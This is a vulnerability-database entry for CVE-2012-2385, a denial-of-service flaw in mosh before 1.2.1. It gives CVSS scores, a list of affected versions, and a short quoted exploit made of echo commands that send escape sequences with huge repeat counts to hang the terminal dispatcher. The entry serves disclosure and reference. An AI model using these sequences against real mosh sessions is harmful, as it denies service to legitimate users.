4
CVSSv2

CVE-2012-2385

Published: 29/06/2012 Updated: 29/08/2017
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
VMScore: 405
Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P

Vulnerability Summary

The terminal dispatcher in mosh prior to 1.2.1 allows remote authenticated users to cause a denial of service (long loop and CPU consumption) via an escape sequence with a large repeat count value.

Vulnerable Product Search on Vulmon Subscribe to Product

keith winstein mosh 1.0

keith winstein mosh 0.98c

keith winstein mosh 1.2

keith winstein mosh 1.1.3-1

keith winstein mosh 1.1.3

keith winstein mosh

keith winstein mosh 1.1.2

keith winstein mosh 1.1.1

keith winstein mosh 1.1

keith winstein mosh 1.1.3-2

Exploits

source: wwwsecurityfocuscom/bid/53646/info Mosh is prone to a remote denial-of-service vulnerability An attacker can exploit this issue to cause the affected application to crash or to enter an endless loop, denying service to legitimate users echo -en "\e[2147483647L" echo -en "\e[2147483647M" echo -en "\e[2147483647@" echo -en "\e[ ...